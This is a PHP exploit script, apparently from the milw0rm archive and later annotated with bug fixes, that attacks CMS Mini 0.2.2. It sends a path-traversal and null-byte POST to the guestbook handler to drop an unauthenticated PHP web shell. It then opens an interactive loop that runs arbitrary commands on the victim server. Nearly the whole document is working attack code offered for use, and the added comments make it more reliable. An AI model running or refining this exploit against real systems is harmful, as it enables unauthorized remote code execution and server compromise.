--+++================================================================+++--
--+++====== CMS Mini <= 0.2.2 Remote Command Execution Exploit ======+++--
--+++================================================================+++--
5 <?php
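/**
 * Print the banner and usage text, then terminate.
 *
 * Only reached when the argument count is wrong, so the text goes to STDERR
 * and the process exits non-zero. The original exit($string) form wrote to
 * STDOUT and returned status 0, which hides the error from anything driving
 * this script non-interactively.
 */
function usage ()
{
    $lines = array (
        "",
        "CMS Mini <= 0.2.2 Remote Command Execution Exploit",
        "[+] Author : darkjoker",
        "[+] Site : http://darkjoker.net23.net",
        "[+] Download: http://ovh.dl.sourceforge.net/sourceforge/cmsmini/cmsmini-0.2.2.tar.gz",
        "[+] Usage : php xpl.php <hostname> <path>",
        "[+] Ex. : php xpl.php localhost /CMSmini",
        "",
        "",
    );
    // Leading "" and two trailing "" reproduce the original's "\n...\n\n" framing.
    fwrite (STDERR, implode ("\n", $lines));
    exit (1);
}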
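// Bail out on a wrong argument count. The original read `usage;` -- a bare
// constant expression, not a call -- so the banner was never printed and
// execution fell through to fsockopen() with $argv[1] unset.
if ($argc != 3) {
    usage ();
}

$hostname = $argv [1];
// Normalise the install path to "/dir" (leading slash guaranteed, no trailing
// slash) so the URLs built below are well-formed whatever the user typed.
$path = rtrim ('/' . ltrim ($argv [2], '/'), '/');

// Plain HTTP on port 80 only. Check the connection: the original wrote to
// the handle unconditionally, which only produced a warning on failure.
$fp = @fsockopen ($hostname, 80, $errno, $errstr, 10);
if ($fp === false) {
    fwrite (STDERR, "[-] Could not connect to {$hostname}:80: {$errstr} ({$errno})\n");
    exit (1);
}

// Payload written into the dropped file. `<?php` instead of `<?` so it also
// runs where short_open_tag is off; form-encoding the value leaves what the
// server decodes byte-identical to the raw string the original sent.
// Note it is an unauthenticated shell: anyone who can reach file.php can run
// commands while it exists.
$payload = "<?php system (\$_GET ['cmd']); die ();?>";
$post    = "message=" . urlencode ($payload);

// The guestbook handler is hit with path=.. and p=file.php%00, and the loop
// that follows requests {$path}/file.php -- so the handler presumably writes
// `message` to the file named by `p`, with %00 cutting off whatever suffix it
// appends (null-byte truncation, which PHP >= 5.3.4 rejects). Verify this
// against the target's view/index.php before relying on it.
$request = "POST {$path}/view/index.php?op=guestbook&path=..&p=file.php%00 HTTP/1.1\r\n"
         . "Host: {$hostname}\r\n"
         . "Connection: Close\r\n"
         . "Content-Type: application/x-www-form-urlencoded\r\n"
         . "Content-Length: " . strlen ($post) . "\r\n\r\n"
         . $post;
fwrite ($fp, $request);

// Drain the reply before closing. Closing immediately after the write, as the
// original did, can reset the connection before the server has handled the
// request, and the status line tells the operator whether the drop went through.
$response = stream_get_contents ($fp);
fclose ($fp);
$status = is_string ($response) ? strtok ($response, "\r\n") : false;
echo "[+] Target answered: " . ($status === false ? "(no response)" : $status) . "\n";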
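// Interactive loop: every line typed is sent as ?cmd= to the dropped shell and
// the raw output echoed back. "exit" (or EOF on stdin) removes file.php first --
// important, since the shell is reachable without authentication while it exists.
$stdin = fopen ("php://stdin", "r");
$shell = "http://{$hostname}{$path}/file.php";
while (true) {
    echo "$ ";
    $line = fgets ($stdin, 1024);
    // fgets() returns false at EOF; the original fed that to trim() and spun
    // forever on an empty command, so EOF is treated as "exit".
    $cmd = ($line === false) ? "exit" : trim ($line);
    if ($cmd === "exit") {
        // Best-effort cleanup: ask the shell to delete itself. `rm file.php` is
        // relative to the server process's working directory -- presumably the
        // directory holding file.php, but not guaranteed; confirm it is gone.
        @file_get_contents ("{$shell}?cmd=rm%20file.php");
        break;
    }
    if ($cmd === "") {
        continue;   // nothing to run; the original issued an empty command anyway
    }
    // rawurlencode() the whole command: the original only replaced spaces, so a
    // command containing '&', '#', '+' or '%' was mangled by the query-string
    // parser before it reached system().
    $output = file_get_contents ("{$shell}?cmd=" . rawurlencode ($cmd));
    if ($output === false) {
        fwrite (STDERR, "[-] Request to {$shell} failed (was file.php dropped?)\n");
        continue;
    }
    echo $output;
}
fclose ($stdin);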
47 ?>
# milw0rm.com [2009-02-02]
CMS Mini 0.2.2 Remote Command Execution Exploit
darkjoker
02/02/2009